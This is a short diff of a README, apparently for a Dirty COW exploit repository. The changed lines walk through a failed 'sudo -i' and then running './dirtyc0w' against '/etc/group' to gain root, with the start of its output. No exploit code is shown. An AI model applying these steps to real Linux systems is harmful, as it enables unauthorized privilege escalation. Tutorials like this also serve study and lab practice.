BrolyCode/Dirty-Cow/README.md

 ```

-We try to log in as root
+We can try to login as a root
 ```
 sudo -i

 ```
+But the system will refuse to, because We don't have the right to access.
 We will now exploit the fail on `/etc/group`
 ```
 ./dirtyc0w
 ```
-It will print out the following to the terminal
+It will print out the following to the terminal, you must wait a litle bite of time (2/3 minutes).
 ```
 mmap 7fd0facf4000